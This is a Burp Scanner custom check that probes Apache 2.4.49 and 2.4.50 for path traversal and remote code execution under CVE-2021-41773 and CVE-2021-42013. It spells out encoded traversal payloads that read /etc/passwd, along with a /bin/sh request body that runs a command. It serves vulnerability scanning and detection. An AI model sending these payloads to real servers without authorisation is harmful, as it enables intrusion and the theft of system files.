# Burp Scanner custom check (BCheck) for the Apache HTTP Server path-normalisation
# flaws CVE-2021-41773 (2.4.49) and CVE-2021-42013 (2.4.50). Every probe below
# requests a traversal path under /cgi-bin/ and treats the string "root:x:0" in the
# response as evidence that the traversal (or the RCE variant) succeeded.
metadata:
language: v2-beta
name: "CVE-2021-41773 & CVE-2021-42013 (Apache 2.4.49 and 2.4.50)"
description: "Path traversal and RCE tests for CVE-2021-41773 and CVE-2021-42013"
author: "r3nt0n"
tags: "active", "apache", "cve", "path traversal", "rce"
# Probe paths. The *_49 variants use the single-encoded dot sequence ".%2e" that
# 2.4.49 failed to normalise; the *_50 variants use the double-encoded "%%32%65"
# form that still got through the 2.4.50 fix. These literal sequences in request
# logs are also the signature a defender would look for when hunting for attempts.
define:
payload_path_trav_49 = "/cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/etc/passwd"
payload_rce_49 = "/cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/bin/sh"
payload_path_trav_50 = "/cgi-bin/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/etc/passwd"
payload_rce_50 = "/cgi-bin/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/bin/sh"
# "given host" runs the check once per in-scope host; each "send request" below is
# derived from that host's base request with the path (and, for RCE, the body) replaced.
given host then
# Apache 2.4.49 (CVE-2021-41773)
# Read-only traversal probe; the marker is searched for in the whole response text.
send request called path_trav_49:
replacing path: `{payload_path_trav_49}`
if "root:x:0" in {path_trav_49.response} then
# "and continue" keeps the check running so the remaining probes are still sent.
report issue and continue:
name: `Path Traversal (CVE-2021-41773)`
severity: high
confidence: firm
detail: `Path traversal via Apache 2.4.49 (CVE-2021-41773)`
end if
# RCE probe: same traversal aimed at /bin/sh, with the command supplied in the body.
send request called rce_49:
replacing path: `{payload_rce_49}`
replacing body: `echo Content-Type: text/plain; echo; cat /etc/passwd`
# A plain "report issue" (no "and continue") ends the check, so the 2.4.50 probes
# below only run when this one did not fire. Intentional: a 2.4.49 host is already
# fully confirmed at this point.
if "root:x:0" in {rce_49.response} then
report issue: # stop here if find issue, continue if not
name: `Remote Code Execution (CVE-2021-41773)`
severity: high
confidence: firm
detail: `Remote code execution via Apache 2.4.49 (CVE-2021-41773)`
end if
# Apache 2.4.50 (CVE-2021-42013)
# Same two probes as above, using the double-encoded traversal sequence.
send request called path_trav_50:
replacing path: `{payload_path_trav_50}`
if "root:x:0" in {path_trav_50.response} then
report issue and continue:
name: `Path Traversal (CVE-2021-42013)`
severity: high
confidence: firm
detail: `Path traversal via Apache 2.4.50 (CVE-2021-42013)`
end if
send request called rce_50:
replacing path: `{payload_rce_50}`
replacing body: `echo Content-Type: text/plain; echo; cat /etc/passwd`
# Last probe, so "report issue" without "and continue" changes nothing here.
if "root:x:0" in {rce_50.response} then
report issue:
name: `Remote Code Execution (CVE-2021-42013)`
severity: high
confidence: firm
detail: `Remote code execution via Apache 2.4.50 (CVE-2021-42013)`
end if